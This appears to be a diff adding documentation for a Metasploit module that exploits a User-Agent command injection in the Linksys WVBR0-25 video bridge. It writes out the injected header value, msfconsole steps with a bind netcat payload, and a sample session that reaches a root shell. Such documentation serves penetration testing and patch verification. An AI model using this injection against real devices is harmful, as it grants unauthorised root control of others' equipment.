|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/). |
| 4 | + The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified. |
| 5 | + |
| 6 | + There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an md5 hash of the random string, the device is vulnerable to command injection. |
| 7 | + |
| 8 | + Manual exploitation would equate to browsing to the URI `http://<ip>/` with the User-Agent header set to `"; command;`. |
| 9 | + |
| 10 | + Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit. |
| 11 | + |
| 12 | +## Verification Steps |
| 13 | + |
| 14 | + 1. Make sure the device is running. |
| 15 | + 2. Start msfconsole. |
| 16 | + 3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth``` |
| 17 | + 4. Do: ```set payload cmd/unix/bind_netcat``` |
| 18 | + 5. Do: ```set RHOST <ip>``` |
| 19 | + 6. Do: ```exploit``` |
| 20 | + 7. You should get a shell. |
| 21 | + |
| 22 | +## Options |
| 23 | + |
| 24 | + **PAYLOAD** |
| 25 | + |
| 26 | + The `generic` and `netcat` payload types are valid. |
| 27 | + |
| 28 | +## Scenarios |
| 29 | + |
| 30 | +### Firmware 1.0.39 |
| 31 | + |
| 32 | + The following is an example run getting a shell: |
| 33 | + |
| 34 | + ``` |
| 35 | + msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth |
| 36 | + msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat |
| 37 | + payload => cmd/unix/bind_netcat |
| 38 | + msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104 |
| 39 | + RHOST => 10.0.0.104 |
| 40 | + msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit |
| 41 | +
|
| 42 | + [*] 10.0.0.104:80 - Trying to access the device ... |
| 43 | + [*] Started bind handler |
| 44 | + [*] 10.0.0.104:80 - Exploiting... |
| 45 | + [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600 |
| 46 | + id |
| 47 | +
|
| 48 | + uid=0(root) gid=0(root) |
| 49 | + ``` |
0 commit comments